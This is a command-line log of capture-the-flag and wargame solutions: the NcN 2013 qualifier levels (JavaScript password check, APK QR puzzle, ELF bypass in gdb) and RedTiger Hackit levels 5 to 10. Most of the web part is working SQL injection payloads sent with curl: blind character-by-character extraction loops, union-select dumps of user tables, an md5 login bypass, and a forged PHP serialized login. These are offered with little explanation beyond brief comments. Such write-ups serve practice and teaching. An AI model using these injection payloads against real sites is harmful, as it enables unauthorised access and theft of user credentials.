> var _0x52ae=["\x66\x20\x6F\x28\x38\x29\x7B\x63\x20\x69\x2C\x6A\x3D\x30\x3B\x6B\x28\x69\x3D\x30\x3B\x69\x3C\x38\x2E\x6C\x3B\x69\x2B\x2B\x29\x7B\x6A\x2B\x3D\x28\x38\x5B\x69\x5D\x2E\x73\x28\x29\x2A\x28\x69\x2B\x31\x29\x29\x7D\x67\x20\x74\x2E\x75\x28\x6A\x29\x25\x76\x7D\x66\x20\x70\x28\x68\x29\x7B\x68\x3D\x68\x2E\x71\x28\x30\x29\x3B\x63\x20\x69\x3B\x6B\x28\x69\x3D\x30\x3B\x69\x3C\x77\x3B\x2B\x2B\x69\x29\x7B\x63\x20\x35\x3D\x69\x2E\x78\x28\x79\x29\x3B\x6D\x28\x35\x2E\x6C\x3D\x3D\x31\x29\x35\x3D\x22\x30\x22\x2B\x35\x3B\x35\x3D\x22\x25\x22\x2B\x35\x3B\x35\x3D\x7A\x28\x35\x29\x3B\x6D\x28\x35\x3D\x3D\x68\x29\x41\x7D\x67\x20\x69\x7D\x66\x20\x6E\x28\x38\x29\x7B\x63\x20\x69\x2C\x61\x3D\x30\x2C\x62\x3B\x6B\x28\x69\x3D\x30\x3B\x69\x3C\x38\x2E\x6C\x3B\x2B\x2B\x69\x29\x7B\x62\x3D\x70\x28\x38\x2E\x71\x28\x69\x29\x29\x3B\x61\x2B\x3D\x62\x2A\x28\x69\x2B\x31\x29\x7D\x67\x20\x61\x7D\x66\x20\x42\x28\x39\x29\x7B\x63\x20\x32\x3B\x32\x3D\x6E\x28\x39\x2E\x64\x2E\x65\x29\x3B\x32\x3D\x32\x2A\x28\x33\x2B\x31\x2B\x33\x2B\x33\x2B\x37\x29\x3B\x32\x3D\x32\x3E\x3E\x3E\x36\x3B\x32\x3D\x32\x2F\x34\x3B\x32\x3D\x32\x5E\x43\x3B\x6D\x28\x32\x21\x3D\x30\x29\x7B\x72\x28\x27\x44\x20\x64\x21\x27\x29\x7D\x45\x7B\x72\x28\x27\x46\x20\x64\x20\x3A\x29\x27\x29\x7D\x39\x2E\x47\x2E\x65\x3D\x6E\x28\x39\x2E\x64\x2E\x65\x29\x3B\x39\x2E\x48\x2E\x65\x3D\x22\x49\x22\x2B\x6F\x28\x39\x2E\x64\x2E\x65\x29\x3B\x67\x20\x4A\x7D","\x7C","\x73\x70\x6C\x69\x74","\x7C\x7C\x72\x65\x73\x7C\x7C\x7C\x68\x65\x78\x5F\x69\x7C\x7C\x7C\x73\x74\x72\x7C\x66\x6F\x72\x6D\x7C\x7C\x7C\x76\x61\x72\x7C\x70\x61\x73\x73\x77\x6F\x72\x64\x7C\x76\x61\x6C\x75\x65\x7C\x66\x75\x6E\x63\x74\x69\x6F\x6E\x7C\x72\x65\x74\x75\x72\x6E\x7C\x66\x6F\x6F\x7C\x7C\x68\x61\x73\x68\x7C\x66\x6F\x72\x7C\x6C\x65\x6E\x67\x74\x68\x7C\x69\x66\x7C\x6E\x75\x6D\x65\x72\x69\x63\x61\x6C\x5F\x76\x61\x6C\x75\x65\x7C\x73\x69\x6D\x70\x6C\x65\x48\x61\x73\x68\x7C\x61\x73\x63\x69\x69\x5F\x6F\x6E\x65\x7C\x63\x68\x61\x72\x41\x74\x7C\x61\x6C\x65\x72\x74\x7C\x63\x68\x61\x72\x43\x6F\x64\x65\x4
1\x74\x7C\x4D\x61\x74\x68\x7C\x61\x62\x73\x7C\x33\x31\x33\x33\x37\x7C\x32\x35\x36\x7C\x74\x6F\x53\x74\x72\x69\x6E\x67\x7C\x31\x36\x7C\x75\x6E\x65\x73\x63\x61\x70\x65\x7C\x62\x72\x65\x61\x6B\x7C\x65\x6E\x63\x72\x79\x70\x74\x7C\x34\x31\x35\x33\x7C\x49\x6E\x76\x61\x6C\x69\x64\x7C\x65\x6C\x73\x65\x7C\x43\x6F\x72\x72\x65\x63\x74\x7C\x6B\x65\x79\x7C\x76\x65\x72\x69\x66\x69\x63\x61\x74\x69\x6F\x6E\x7C\x79\x65\x73\x7C\x74\x72\x75\x65","","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x72\x65\x70\x6C\x61\x63\x65","\x5C\x77\x2B","\x5C\x62","\x67"];console.log(function (_0x7038x1,_0x7038x2,_0x7038x3,_0x7038x4,_0x7038x5,_0x7038x6){_0x7038x5=function (_0x7038x3){return (_0x7038x3<_0x7038x2?_0x52ae[4]:_0x7038x5(parseInt(_0x7038x3/_0x7038x2)))+((_0x7038x3=_0x7038x3%_0x7038x2)>35?String[_0x52ae[5]](_0x7038x3+29):_0x7038x3.toString(36));} ;if(!_0x52ae[4][_0x52ae[6]](/^/,String)){while(_0x7038x3--){_0x7038x6[_0x7038x5(_0x7038x3)]=_0x7038x4[_0x7038x3]||_0x7038x5(_0x7038x3);} ;_0x7038x4=[function (_0x7038x5){return _0x7038x6[_0x7038x5];} ];_0x7038x5=function (){return _0x52ae[7];} ;_0x7038x3=1;} ;while(_0x7038x3--){if(_0x7038x4[_0x7038x3]){_0x7038x1=_0x7038x1[_0x52ae[6]]( new RegExp(_0x52ae[8]+_0x7038x5(_0x7038x3)+_0x52ae[8],_0x52ae[9]),_0x7038x4[_0x7038x3]);} ;} ;return _0x7038x1;} (_0x52ae[0],46,46,_0x52ae[3][_0x52ae[2]](_0x52ae[1]),0,{}));
function simpleHash(str){var i,hash=0;for(i=0;i<str.length;i++){hash+=(str[i].charCodeAt()*(i+1))}return Math.abs(hash)%31337}function ascii_one(foo){foo=foo.charAt(0);var i;for(i=0;i<256;++i){var hex_i=i.toString(16);if(hex_i.length==1)hex_i="0"+hex_i;hex_i="%"+hex_i;hex_i=unescape(hex_i);if(hex_i==foo)break}return i}function numerical_value(str){var i,a=0,b;for(i=0;i<str.length;++i){b=ascii_one(str.charAt(i));a+=b*(i+1)}return a}function encrypt(form){var res;res=numerical_value(form.password.value);res=res*(3+1+3+3+7);res=res>>>6;res=res/4;res=res^4153;if(res!=0){alert('Invalid password!')}else{alert('Correct password :)')}form.key.value=numerical_value(form.password.value);form.verification.value="yes"+simpleHash(form.password.value);return true}
> function simpleHash(str){
...      var i,hash=0;
...      for(i=0;i<str.length;i++){
.....           hash+=(str[i].charCodeAt()*(i+1))
.....      }
...      return Math.abs(hash)%31337
... }
> function ascii_one(foo) {
...     foo = foo.charAt(0);
...     var i;
...     for (i = 0; i < 256; ++i) {
.....         var hex_i = i.toString(16);
.....         if (hex_i.length == 1) hex_i = "0" + hex_i;
.....         hex_i = "%" + hex_i;
.....         hex_i = unescape(hex_i);
.....         if (hex_i == foo) break
.....     }
...     return i
... }
> function numerical_value(str) {
...     var i, a = 0, b;
...     for (i = 0; i < str.length; ++i) {
.....         b = ascii_one(str.charAt(i));
.....         a += b * (i + 1)
.....     }
...     return a
... }
> function encrypt(form) {
...     var res;
...     res = numerical_value(form.password.value);
...     res = res * (3 + 1 + 3 + 3 + 7);
...     res = res >>> 6;
...     res = res / 4;
...     res = res ^ 4153;
...     if (res != 0) {
.....         alert('Invalid password!')
.....     } else {
.....         alert('Correct password :)')
...     }
...     form.key.value = numerical_value(form.password.value);
...     form.verification.value = "yes" + simpleHash(form.password.value);
...     return true
... }
> var max=700000; var total=0; for (var i = 0; i < max; ++i) { total=(((i*17)>>>6)/4)^4153; if(total==0){console.log(i);}; };
62540
62541
62542
62543
62544
62545
62546
62547
62548
62549
62550
62551
62552
62553
62554
> function init(dec,len){
...  var deckey=new Array();
...  for(var i=1; i<=len; i++){ deckey[i]=dec; }
...  return deckey;
... }
> function add(deckey,len){
...  var counter=0;
...  for(var i=1; i<=len; i++){ counter+=deckey[i]*i; }
...  return counter;
... }
> var len, dist, deckey, count, key;
> len=100;
> for(var dec=32; dec<=126; dec++){
...  dist=126-dec;
...  for(var i=1; i<=len; i++){
.....   deckey=init(dec,i);
.....   count=add(deckey,i);
.....   diff=62540-count;
.....   if((0<=diff)&&(diff<=dist)){
.......    key=String.fromCharCode(dec+diff);
.......    char=String.fromCharCode(dec);
.......    for(var j=1; j<=i-1; j++){
.........     key+=char;
.........    }
.......    console.log("key = '"+key+"'");
.......   }
.....  }
... }
key = 'L                                                             '
key = 'r1111111111111111111111111111111111111111111111111'
key = 't333333333333333333333333333333333333333333333333'
> simpleHash('r1111111111111111111111111111111111111111111111111');
31203
# curl --silent --request POST --data 'password=r1111111111111111111111111111111111111111111111111&key=62540&verification=yes31203' http://ctf.noconname.org/4cbe48a830c4cd2d4ac9e6e9373e3055/login.php
<!DOCTYPE html>
<html>
  <head>
    <title>NcN 2013 Registration Quals</title>
 </head>
<body>
<b>Congrats! you passed the level! Here is the key: 23f8d1cea8d60c5816700892284809a94bd00fe7347645b96a99559749c7b7b8</b></body>
</html>

# cat level_1.c
#include <stdio.h>
#include <stdlib.h>

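/*
 * Depth-first search for strings of printable ASCII whose weighted sum
 *     sum_{j=0}^{len-1} key[j] * (j+1)
 * lies in [max, max+14], i.e. one of the 15 consecutive values the
 * JavaScript check above accepts (62540..62554 in the brute force).
 *
 * key      scratch buffer of at least len ints; key[pos-1] is written here
 * partial  weighted sum of the positions already fixed (pos+1 .. len)
 * pos      1-based position chosen now; positions are filled from len down to 1
 * max      lowest acceptable total
 * len      key length, used to print the candidate
 *
 * Returns the number of candidates printed. (The original was declared int
 * but returned nothing.)
 */
int level1(int *key,int partial,int pos,int max,int len){
        int i,j,total,found=0;
        if(pos==1){
                /* Last position has weight 1: the total is partial+i. */
                for(i=126;i>=32;i--){
                        total=partial+i;
                        if((max<=total)&&(total<=max+14)){
                                key[pos-1]=i;
                                printf("key '\t");
                                for(j=0;j<len;j++){ printf("%c",key[j]); }
                                printf("'\t%d <= (%d) <= %d\n",max,total,max+14);
                                found++;
                        }
                }
        }else{
                /* Try '~' down to ' '; prune once the running sum passes max. */
                for(i=126;i>=32;i--){
                        total=partial+pos*i;
                        if(total<=max){
                                key[pos-1]=i;
                                found+=level1(key,total,pos-1,max,len);
                        }
                }
        }
        return found;
}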
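/*
 * Usage: level_1 MAX LEN
 * For every key length 1..LEN whose all-'~' sum can reach MAX, run level1.
 *
 * Fixes the original allocation, malloc(sizeof(int)*i+1): that is
 * sizeof(int)*i + 1 bytes, three bytes short of the i+1 ints level1 writes
 * (a small heap overflow on key[i]). Also checks argc and the malloc result.
 */
int main(int argc, char *argv[]){
        int *key,len,i,j,total,max;
        if(argc<3){
                fprintf(stderr,"usage: %s max len\n",argv[0]);
                return 1;
        }
        max=atoi(argv[1]);
        len=atoi(argv[2]);
        for(i=0;i<len;i++){
                /* Largest sum a key of length i+1 can produce (every byte 126). */
                total=0;
                for(j=0;j<=i;j++){ total+=126*(j+1); }
                if(max<=total){
                        key=malloc(sizeof(int)*(i+1));
                        if(key==NULL){
                                perror("malloc");
                                return 1;
                        }
                        printf("Trying key length = %d, total = %d and >= %d\n",i+1,total,max);
                        level1(key,0,i+1,max,i+1);
                        free(key);
                }
        }
        return 0;
}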
# gcc -o level_1 level_1.c
# ./level_1 62540 50
Trying key length = 32, total = 66528 and >= 62540
key     '   !    <~~~~~~~~~~~~~~~~~~~~~~~'      62540 <= (62554) <= 62554
key     '! !     <~~~~~~~~~~~~~~~~~~~~~~~'      62540 <= (62554) <= 62554
key     '  !     <~~~~~~~~~~~~~~~~~~~~~~~'      62540 <= (62553) <= 62554
key     ' "      <~~~~~~~~~~~~~~~~~~~~~~~'      62540 <= (62554) <= 62554
key     '"!      <~~~~~~~~~~~~~~~~~~~~~~~'      62540 <= (62554) <= 62554
key     '!!      <~~~~~~~~~~~~~~~~~~~~~~~'      62540 <= (62553) <= 62554
key     ' !      <~~~~~~~~~~~~~~~~~~~~~~~'      62540 <= (62552) <= 62554
key     '$       <~~~~~~~~~~~~~~~~~~~~~~~'      62540 <= (62554) <= 62554
key     '#       <~~~~~~~~~~~~~~~~~~~~~~~'      62540 <= (62553) <= 62554
key     '"       <~~~~~~~~~~~~~~~~~~~~~~~'      62540 <= (62552) <= 62554
key     '!       <~~~~~~~~~~~~~~~~~~~~~~~'      62540 <= (62551) <= 62554
key     '        <~~~~~~~~~~~~~~~~~~~~~~~'      62540 <= (62550) <= 62554
...
> simpleHash('   !    <~~~~~~~~~~~~~~~~~~~~~~~');
31217
# curl --silent --request POST --data 'password=   !    <~~~~~~~~~~~~~~~~~~~~~~~&key=62554&verification=yes31217' http://ctf.noconname.org/4cbe48a830c4cd2d4ac9e6e9373e3055/login.php
<!DOCTYPE html>
<html>
  <head>
    <title>NcN 2013 Registration Quals</title>
 </head>
<body>
<b>Congrats! you passed the level! Here is the key: 23f8d1cea8d60c5816700892284809a94bd00fe7347645b96a99559749c7b7b8</b></body>
</html>
Access Level 2

# curl --silent --output level.apk http://ctf.noconname.org/ad4d4084729af5c8faef2df8636c450e/level.apk
# unzip level.apk
# dex2jar classes.dex
# jd-gui classes_dex2jar.jar # and code review
# cd res/raw
# mv i.png qr-f.png
# mv j.png qr-e.png
# mv d.png qr-d.png
# mv h.png qr-c.png
# mv e.png qr-3.png
# mv l.png qr-2.png
# mv o.png qr-7.png
# mv n.png qr-b.png
# mv p.png qr-8.png
# mv m.png qr-1.png
# mv f.png qr-0.png
# mv c.png qr-4.png
# mv k.png qr-5.png
# mv g.png qr-6.png
# mv a.png qr-9.png
# mv b.png qr-a.png
# montage *.png -tile 4x4 -geometry +0+0 qr.png
# zbarimg --raw --quiet qr.png
788f5ff85d370646d4caa9af0a103b338dbe4c4bb9ccbd816b585c69de96d9da
Access Level 3

# curl --silent --output level.elf http://ctf.noconname.org/94999ecd63b3764ac334bcab4c4960d5/level.elf
# file level.elf
level.elf: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0xb589d432799bf15343387fea63d4bdc00faa177c, not stripped
# chmod +x level.elf
# gdb -q level.elf
(gdb) set disassembly-flavor intel
(gdb) x/s 0x4024a8
0x4024a8:        "Type to win, only what I want to read... "
(gdb) x/25i 0x00000000004010f3
   0x4010f3 <main+212>: call   0x400fef <getch>
   0x4010f8 <main+217>: movsx  eax,al
   0x4010fb <main+220>: mov    DWORD PTR [rbp-0x4],eax
   0x4010fe <main+223>: mov    eax,DWORD PTR [rbp-0x8]
   0x401101 <main+226>: cdqe
   0x401103 <main+228>: mov    eax,DWORD PTR [rax*4+0x6033a0]
   0x40110a <main+235>: cmp    eax,DWORD PTR [rbp-0x4]
   0x40110d <main+238>: jne    0x40111e <main+255>
   0x40110f <main+240>: mov    DWORD PTR [rbp-0xc],0x1
   0x401116 <main+247>: cmp    DWORD PTR [rbp-0x4],0x51
   0x40111a <main+251>: je     0x40112d <main+270>
   0x40111c <main+253>: jmp    0x401127 <main+264>
   0x40111e <main+255>: mov    DWORD PTR [rbp-0xc],0x0
   0x401125 <main+262>: jmp    0x401154 <main+309>
   0x401127 <main+264>: cmp    DWORD PTR [rbp-0x4],0x71
   0x40112b <main+268>: jne    0x401136 <main+279>
   0x40112d <main+270>: mov    DWORD PTR [rbp-0x10],0x1
   0x401134 <main+277>: jmp    0x401154 <main+309>
   0x401136 <main+279>: mov    rax,QWORD PTR [rip+0x2022a3]        # 0x6033e0 <stdout@@GLIBC_2.2.5>
   0x40113d <main+286>: mov    rsi,rax
   0x401140 <main+289>: mov    edi,0x2a
   0x401145 <main+294>: call   0x400610 <fputc@plt>
   0x40114a <main+299>: add    DWORD PTR [rbp-0x8],0x1
   0x40114e <main+303>: cmp    DWORD PTR [rbp-0x8],0x9
   0x401152 <main+307>: jle    0x4010f3 <main+212>
(gdb) x/30s 0x6033a0
0x6033a0 <facebookctf_rocks>:    " "
0x6033a2 <facebookctf_rocks+2>:  ""
0x6033a3 <facebookctf_rocks+3>:  ""
0x6033a4 <facebookctf_rocks+4>:  "S"
0x6033a6 <facebookctf_rocks+6>:  ""
0x6033a7 <facebookctf_rocks+7>:  ""
0x6033a8 <facebookctf_rocks+8>:  "U"
0x6033aa <facebookctf_rocks+10>:         ""
0x6033ab <facebookctf_rocks+11>:         ""
0x6033ac <facebookctf_rocks+12>:         "R"
0x6033ae <facebookctf_rocks+14>:         ""
0x6033af <facebookctf_rocks+15>:         ""
0x6033b0 <facebookctf_rocks+16>:         "P"
0x6033b2 <facebookctf_rocks+18>:         ""
0x6033b3 <facebookctf_rocks+19>:         ""
0x6033b4 <facebookctf_rocks+20>:         "R"
0x6033b6 <facebookctf_rocks+22>:         ""
0x6033b7 <facebookctf_rocks+23>:         ""
0x6033b8 <facebookctf_rocks+24>:         "I"
0x6033ba <facebookctf_rocks+26>:         ""
0x6033bb <facebookctf_rocks+27>:         ""
0x6033bc <facebookctf_rocks+28>:         "S"
0x6033be <facebookctf_rocks+30>:         ""
0x6033bf <facebookctf_rocks+31>:         ""
0x6033c0 <facebookctf_rocks+32>:         "E"
0x6033c2 <facebookctf_rocks+34>:         ""
0x6033c3 <facebookctf_rocks+35>:         ""
0x6033c4 <facebookctf_rocks+36>:         "!"
0x6033c6 <facebookctf_rocks+38>:         ""
0x6033c7 <facebookctf_rocks+39>:         ""
# echo ' SURPRISE!' | ./level.elf
|  >  Type to win, only what I want to read...
|  >  **********
|
|  -> Congratulations! The key is:
|  9e0d399e83e7c50c615361506a294eca22dc49bfddd90eb7a831e90e9e1bf2fb
# gdb -q level.elf
(gdb) set disassembly-flavor intel
(gdb) break main
(gdb) run
(gdb) x/2i 0x40117b
   0x40117b <main+348>: call   0x400b38 <success>
   0x401180 <main+353>: call   0x40077c <no_me_jodas_manolo>
(gdb) set $rip = 0x40117b
(gdb) continue 
Continuing.
|
|  -> Congratulations! The key is:
|  9e0d399e83e7c50c615361506a294eca22dc49bfddd90eb7a831e90e9e1bf2fb

# RedTigers Hackit wargame: Level 10


# curl --silent --insecure --cookie-jar level10 --cookie level10 --request POST --data "password=646f6e745f7468726f775f73746f6e6573&level10login=Login" https://redtiger.dyndns.org/hackit/level10.php
                <b>Welcome to Level 10</b><br><br>
                Target: Bypass the login. Login as TheMaster<br>
                <br><br><br>
                <form method="post">
                        <input type="hidden" name='login' value="YToyOntzOjg6InVzZXJuYW1lIjtzOjY6Ik1vbmtleSI7czo4OiJwYXNzd29yZCI7czoxMjoiMDgxNXBhc3N3b3JkIjt9">
                        <input type="submit" value="Login" name="dologin">
                </form>
                <br><br><br>
# echo -n "YToyOntzOjg6InVzZXJuYW1lIjtzOjY6Ik1vbmtleSI7czo4OiJwYXNzd29yZCI7czoxMjoiMDgxNXBhc3N3b3JkIjt9" | base64 -d; echo
a:2:{s:8:"username";s:6:"Monkey";s:8:"password";s:12:"0815password";}
# echo -n 'a:2:{s:8:"username";s:9:"TheMaster";s:8:"password";b:1;}' | base64   # password becomes the PHP boolean true (b:1): if the server unserializes this and compares it to the stored password with a loose ==, true equals any non-empty string — the level accepts it below
YToyOntzOjg6InVzZXJuYW1lIjtzOjk6IlRoZU1hc3RlciI7czo4OiJwYXNzd29yZCI7YjoxO30=
# curl --silent --insecure --cookie level10 --request POST --data "login=YToyOntzOjg6InVzZXJuYW1lIjtzOjk6IlRoZU1hc3RlciI7czo4OiJwYXNzd29yZCI7YjoxO30=&dologin=Login" https://redtiger.dyndns.org/hackit/level10.php | grep is:
<br><br>The password for the hall of fame is: <b>796f75536c76645465684861636b6974477261747a</b> <br><br>

# RedTigers Hackit wargame: Level 9


# curl --silent --insecure --cookie-jar level9 --cookie level9 --request POST --data "password=736c61705f7468655f6c616d65727a&level9login=Login" https://redtiger.dyndns.org/hackit/level9.php
                <b>Welcome to Level 9</b><br><br>
                Target: Get username and password of any user. Tablename: level9_users<br>
                Its not a blind. There is a way to get an output :) <br>
                <br><br>
        Autor: RedTiger <br>Title: Lorem ipsum <br>Lorem ipsum dolor sit amet, consetetur sadipscing elitr, sed diam nonumy eirmod tempor invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua. At vero eos et accusam et justo duo dolores et ea rebum. Stet clita kasd gubergren, no sea takimata sanctus est Lorem ipsum dolor sit amet. <br><br>                     <form method="POST">
                                Name: <input type="text" name="autor"> <br>
                                Title: <input type="text" name="title"><br>
                                <textarea name="text"></textarea>
                                <input type="submit" name="post">
                        </form>
                                <br><br><br>
                        <form method="post">
                                Username: <input type="text" name="user"><br>
                                Password: <input type="text" name="password">
                                <input type="submit" name="login" value="Login">
                        </form>
                        <br>
# for i in {1..13};  do dec=`curl --silent --insecure --cookie level9 --request POST --data "autor=&title=&text='+%2b+(select+ord(right(username, $[14-$i]))+from+level9_users+limit+1)+%2b+'&post=Submit+Query" https://redtiger.dyndns.org/hackit/level9.php | grep "POST" | awk -F '<br>' '{print $7}'`; hex=`printf "%x" $dec`; echo -n `printf "\x$hex"`; done ; echo
546865426c7565466c6f776572
# for i in {1..145}; do dec=`curl --silent --insecure --cookie level9 --request POST --data "autor=&title=&text='+%2b+(select+ord(right(password,$[146-$i]))+from+level9_users+limit+1)+%2b+'&post=Submit+Query" https://redtiger.dyndns.org/hackit/level9.php | grep "POST" | awk -F '<br>' '{print $7}'`; hex=`printf "%x" $dec`; echo -n `printf "\x$hex"`; done ; echo
212f666c6f776572706f77657228293d25643436333662444644666c6c636b6668736b646668736b64666873646b6c666861736b6c6466686b6c6668726968776f7537333439353833373439353837342425c2a72526c2a72426c2a724252621c2a72425444653414446415344465344313334353334353132333472356173644651574525c2a7242644466173646661733233343536
# for i in {1..13};  do dec=`curl --silent --insecure --cookie level9 --request POST --data "autor=&title=&text='+%2b+(select+ord(right(reverse(right(reverse(username),$i)),1))+from+level9_users+limit+1)+%2b+'&post=Submit+Query" https://redtiger.dyndns.org/hackit/level9.php | grep "POST" | awk -F '<br>' '{print $7}'`; hex=`printf "%x" $dec`; echo -n `printf "\x$hex"`; done ; echo
546865426c7565466c6f776572
# for i in {1..145}; do dec=`curl --silent --insecure --cookie level9 --request POST --data "autor=&title=&text='+%2b+(select+ord(right(reverse(right(reverse(password),$i)),1))+from+level9_users+limit+1)+%2b+'&post=Submit+Query" https://redtiger.dyndns.org/hackit/level9.php | grep "POST" | awk -F '<br>' '{print $7}'`; hex=`printf "%x" $dec`; echo -n `printf "\x$hex"`; done ; echo
212f666c6f776572706f77657228293d25643436333662444644666c6c636b6668736b646668736b64666873646b6c666861736b6c6466686b6c6668726968776f7537333439353833373439353837342425c2a72526c2a72426c2a724252621c2a72425444653414446415344465344313334353334353132333472356173644651574525c2a7242644466173646661733233343536
# curl --silent --insecure --cookie level9 --request POST --data "autor=&title=&text='),((select username from level9_users limit 1),(select password from level9_users limit 1),'&post=Submit+Query" https://redtiger.dyndns.org/hackit/level9.php | sed 's/<br>/\n/g' | grep -A 1 Autor
Autor: RedTiger
Title: Lorem ipsum
--
Autor:
Title:
--
Autor: 546865426c7565466c6f776572
Title: 212f666c6f776572706f77657228293d25643436333662444644666c6c636b6668736b646668736b64666873646b6c666861736b6c6466686b6c6668726968776f7537333439353833373439353837342425c2a72526c2a72426c2a724252621c2a72425444653414446415344465344313334353334353132333472356173644651574525c2a7242644466173646661733233343536
# curl --silent --insecure --cookie level9 --request POST --data "user=546865426c7565466c6f776572&password=253231253246666c6f776572703239253344253235643436333662444644666c6c636b6668736b646668736b64666873646b6c666861736b6c6466686b6c6668726968776f753733343935383337343935383734253234253235254137253235253236254137253234253236254137253234253235253236253231254137253234253235444653414446415344465344313334353334353132333472356173644651574525323525413725323425323644466173646661733233343536&login=Login" https://redtiger.dyndns.org/hackit/level9.php | grep is:
<br>The password for the next level is: <b>646f6e745f7468726f775f73746f6e6573</b> <br><br>

# RedTigers Hackit wargame: Level 8


# curl --silent --insecure --cookie-jar level8 --cookie level8 --request POST --data "password=4d4f4f636f774d454f57636174&level8login=Login" https://redtiger.dyndns.org/hackit/level8.php
                <b>Welcome to Level 8</b><br><br>
                Target: Get the password of the admin.<br><br><br>

                Username: Admin<br>
                <form method="POST">
                        Email: <input type="text" name="email" value="hans@localhost"> <br>
                        Name: <input type="text" name="name" value="Hans"> <br>
                        ICQ: <input type="text" name="icq" value="12345"> <br>
                        Age: <input type="text" name="age" value="25"> <br>
                        <input type="submit" name="edit" value="Edit">
                </form>
                                <br><br><br>
                        <form method="post">
                                Username: <input type="text" name="user"><br>
                                Password: <input type="text" name="password">
                                <input type="submit" name="login" value="Login">
                        </form>
                        <br>
# for i in `seq 1 20`; do email="' or length(password)='$i"; result=`curl --silent --insecure --cookie level8 --request POST --data "email=$email&edit=Edit" https://redtiger.dyndns.org/hackit/level8.php | grep email | grep 1`; if [ "$result" != "" ]; then echo $i; break; fi; done
18
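# for i in {1..18}; do found=0; for j in {a..z} {0..9}; do email="' or left(right(password,$((19-i))),1)='$j"; if curl --silent --insecure --cookie level8 --request POST --data "email=$email&edit=Edit" https://redtiger.dyndns.org/hackit/level8.php | grep email | grep -q 1; then printf '%s' "$j"; found=1; break; fi; done; (( found )) || printf '?'; done; echo  # '?' marks a position whose byte is outside [a-z0-9]; the original printed nothing there, silently shortening the recovered password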
7468656d65616e696e676f666c6966653432
# curl --silent --insecure --cookie level8 --request POST --data "user=Admin&password=7468656d65616e696e676f666c6966653432&login=Login" https://redtiger.dyndns.org/hackit/level8.php | grep is:
<br>The password for the next level is: <b>736c61705f7468655f6c616d65727a</b> <br><br>

# RedTigers Hackit wargame: Level 7


# curl --silent --insecure --cookie-jar level7 --cookie level7 --request POST --data "password=646f6e745f73686f75745f61745f796f75725f6469736b73&level7login=Login" https://redtiger.dyndns.org/hackit/level7.php
                <b>Welcome to Level 7</b><br><br>
                Target: Get the name of the user who posted the news about google. Table: level7_news column: autor<br>
                Restrictions: no comments, no substr, no substring, no ascii, no mid, no like<br>
                <br><br><br> <form method="post"> <input type="text" name="search" value=""> <input type="submit" value="search!" name="dosearch"> </form> <br><br><br>
                                <br>
                        <form method="post">
                                Username: <input type="text" name="username"><br>
                                <input type="submit" name="try" value="Check!">
                        </form>
                        <br>
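# for i in {1..17}; do found=0; for j in {A..Z} {a..z} {0..9}; do printf -v d '%d' "'$j"; search="Google%' and ord(left(right(news.autor,$((18-i))),1))=$d and '%'='"; if curl --silent --insecure --cookie level7 --request POST --data "search=$search&dosearch=search\!" https://redtiger.dyndns.org/hackit/level7.php | grep -v "<input" | grep -q Google; then printf '%s' "$j"; found=1; break; fi; done; (( found )) || printf '?'; done; echo  # '?' marks a position whose byte is outside [A-Za-z0-9]; the original printed nothing there, silently shortening the recovered name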
5465737455736572666f72673030676c65
# curl --silent --insecure --cookie level7 --request POST --data "username=5465737455736572666f72673030676c65&try=Check\!" https://redtiger.dyndns.org/hackit/level7.php | grep is:
<br>The password for the next level is: <b>4d4f4f636f774d454f57636174</b> <br><br>

# RedTigers Hackit wargame: Level 6


# curl --silent --insecure --cookie-jar level6 --cookie level6 --request POST --data "password=6d795f6361745f736179735f6d656f776d656f77&level6login=Login" https://redtiger.dyndns.org/hackit/level6.php
                <b>Welcome to Level 6</b><br><br>
                Target: Get the first user in table level6_users with status 1<br>
                <br><br><br> <a href="?user=1">Click me</a><br><br><br>
                                <table style="border-collapse:collapse; border:1px solid black;">
                                <tr>
                                        <td>Username: </td>
                                        <td>deddlef</td>
                                </tr>
                                <tr>
                                        <td>Email: </td>
                                        <td>[email protected]</td>
                                </tr>
                        </table>

                                        <br>
                        <form method="post">
                                Username: <input type="text" name="user"><br>
                                Password: <input type="text" name="password">
                                <input type="submit" name="login" value="Login">
                        </form>
                        <br>
# for i in `seq 1 30`; do echo $i; result=`curl --silent --insecure --cookie level6 "https://redtiger.dyndns.org/hackit/level6.php?user=0%20or%20if((select%20length(password)%20from%20level6_users%20where%20id=3)=$i,true,false)" | grep deddlef`; if [ "$result" != "" ]; then break; fi; done
1
2
3
4
5
6
7
8
9
10
11
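# for i in {1..11}; do found=0; for j in {a..z} {0..9}; do printf -v d '%d' "'$j"; if curl --silent --insecure --cookie level6 "https://redtiger.dyndns.org/hackit/level6.php?user=0%20or%20if((select%20ord(left(right(password,$((12-i))),1))%20from%20level6_users%20where%20id=3)=$d,true,false)" | grep -q deddlef; then printf '%s' "$j"; found=1; break; fi; done; (( found )) || printf '?'; done; echo  # '?' marks a position whose byte is outside [a-z0-9]; the original printed nothing there, silently shortening the recovered password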
6d306e737465726b316c6c
# query2="`echo -n "' union select id,username,email,password,status from level6_users where status=1 limit 1 -- " | xxd -p | tr -d '\n'`"
# query1="`echo -n \"0 union select 1,0x$query2,3,4,5\" | sed 's/ /%20/g'`"
# curl --silent --insecure --cookie level6 "https://redtiger.dyndns.org/hackit/level6.php?user=$query1" | grep -A 1 -e ">Username" -e Email
                                        <td>Username: </td>
                                        <td>admin</td>
--
                                        <td>Email: </td>
                                        <td>6d306e737465726b316c6c</td>
# curl --silent --insecure --cookie level6 --request POST --data "user=admin&password=6d306e737465726b316c6c&login=Login" https://redtiger.dyndns.org/hackit/level6.php | grep is:
<br>The password for the next level is: <b>646f6e745f73686f75745f61745f796f75725f6469736b73</b> <br><br>

# RedTigers Hackit wargame: Level 5


# curl --silent --insecure --cookie-jar level5 --cookie level5 --request POST --data "password=62616e616e61735f6172655f6e6f745f626c7565&level5login=Login" https://redtiger.dyndns.org/hackit/level5.php
                <b>Welcome to Level 5</b><br><br>
                Target: Bypass the login<br>
                Disabled: substring , substr, ( , ), mid<br>
                Hints: its not a blind, the password is md5-crypted, watch the login errors<br><br><br>

                        <form name="login" action="?mode=login" method="POST">
                                Username: <input name="username" size="30" type="text"><br>
                                Password: <input name="password" size="30" type="text">
                                <br>
                                <input name="login" value="Login" type="submit">
                        </form>
# password="whatever"
# echo -n $password | md5sum
008c5926ca861023c1d2a36653fd88e2  -
# username="' union select 'user','008c5926ca861023c1d2a36653fd88e2"
